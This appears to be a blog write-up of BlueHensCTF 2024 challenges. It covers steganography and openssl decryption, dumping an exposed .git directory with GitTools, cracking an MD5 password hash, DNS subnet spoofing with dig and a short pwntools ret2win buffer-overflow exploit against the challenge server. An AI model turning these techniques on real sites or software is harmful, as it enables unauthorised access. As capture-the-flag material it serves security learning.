BlueHensCTF 2024 - Challenges

Published by Josan11th Nov 2024

# git# barcode# dig# dns# forensics# gittools# steg# whitespace

Loading views...

Forensics

Whispers of the Feathered Messenger

Uploading it in aperisolve we get common passwords

Trying one by one, for the password 5B4@7q7!rE\ we got a file encrypted_flag.bin

Seeing the flag, we are able to see a encrypted file

Checking the file type using file we are able to see its openssl encrypted

Searching online how to decrypt openssl encrypted file, openssl file, decrypt openssl file, we get this, altering the command according to our requirements and gained password

openssl enc -d -aes-256-cbc -in encrypted.data -out un_encrypted.data
 
openssl enc -d -aes-256-cbc -in encrypted_flag.bin -out flag.txt
**5B4@7q7!rE\**

We got the flag

Inner Demons

Uploading the file in aperisolve, and checking the result, but we didn’t get anything
We are able to see its steg, steganography, steg decrypt
Trying stegseek

stegseek inner_demons.jpg

Web

Intro to Web

I am able to see, only this message. I tried enumerating directories and subdomains. But couldn’t get anything

But this message made me think there could me /.git directory. Navigating I got a forbidde page. But still we got git directory

Using GitTools tool Dumper get the all the files

./gitdumper.sh https://bluehens-webstuff.chals.io/.git/ /home/j054n/udctf/web/

Now we a can use extracter

/opt/GitTools/Extractor/extractor.sh . Website

In one of the commit we are able to see a login page

 
<!doctype html>
<html>
  <head>
    <title>Deeply Insecure Login</title>
    <style>
      .hide {
        display: none;
      }
    </style>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/blueimp-md5/2.10.0/js/md5.js" type="text/javascript" charset="utf-8"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" type="text/javascript"></script>
  </head>
  <body>
    <h1 id="page">You are NOT logged in.</h1>
    <form id="login">
      <input type="password" id="password" placeholder="Tell me the password to get in."/>
      <button type="submit">Login</button>
    </form>
    <script>
      var form = document.getElementById("login");
      var attemptcount = 0;
      form.addEventListener("submit", function(event){
        event.preventDefault();
 
        attemptcount += 1;
 
        let password = document.getElementById("password").value;
        if (md5(password) == "1c63129ae9db9c60c3e8aa94d3e00495"){
          //You logged in!
          document.getElementById("page").innerHTML = "You ARE logged in... fetching flag";
          form.classList.add('hide');
          $.ajax({
              method:"get",url:"flagme.php",data:{"password":password},success: function(data){
                 $("#page").html(data);
              }
          })
        } else {
          document.getElementById("page").innerHTML = `Still NOT logged in.  ${attemptcount} Attempts.`;
          document.getElementById("password").value = "";
        }
        return false;
      });
    </script>
  </body>
</html>

Decrypting the password in crackstation, we get the password

1c63129ae9db9c60c3e8aa94d3e00495:1qaz2wsx

Understanding the code, we can get the flag by sending a request with the password to flagme.php

curl -X GET "https://bluehens-webstuff.chals.io/flagme.php?password=1qaz2wsx"

DNS

Using the command provided there

dig TXT flag @129.153.36.153

We can see the message saying you need to be in 127.0.0.1
Giving the situation to chatgpt, it gave the command or doing google search accordingly we got the command

dig +subnet=127.0.0.1/32 TXT flag @129.153.36.153

We got the flag

Misc

AlgebrarbegIA

Getting the factorial of 78 and 87 from here (opens in a new tab)
Actually the !87 is the subfactorial, so getting the subfactorial of 87

2k = 78! + !87
 
then,
 
k = (78! + !87)/2

The code is below

seventy8 = 11324281178206297831457521158732046228731749579488251990048962825668835325234200766245086213177344000000000000000000
eighty7 = 775400577052889667046640780055684375763111543171042155757864819229947211564419831641783864807987394389543160788597793657791613938734
 
k = (seventy8+eighty7)//2
print("udctf{",k, "}")

Bees in Space

We got a text file

Copying and pasting it in WHITESPACE DECODER IN DCODE here

We got the flag

Crypto

We get a txt file, which is having some kind of numbers

From this, we can see that these are check digit numbers (opens in a new tab) using the tool to get each numbers we get the below, decoding one by one

85 68 67 84 70 123 98 52 114 99 48 100 51 115 95 99 52 110 95 98 51 95 102 117 110 95 116 48 48 125

Throwing it into cyberchef, we get the flag

Pwn

Intro to PWN

We are able to see vuln function

We send exactly 0x38 bytes of padding, since its local_38 to reach the return address of the stack
After reaching the return address, we overwrite it with the address of win function which is 0x1196 the other things are common so its omitted like 0x000040 and also adding 8 bytes past win to avoid misaligning the stack

Building the code

exploit.py

from pwn import *
 
elf = ELF("./pwnme", checksec=True)
context.binary = elf
 
p = remote("0.cloud.chals.io", 13545)
 
payload = b"A" * 0x38
payload += p64(elf.sym["win"]+8)
print(elf.sym["win"])
print(elf.sym["win"]+8)
print(payload)
p.sendline(payload)
p.interactive()

Sample Blog H7CTF - Web Challenges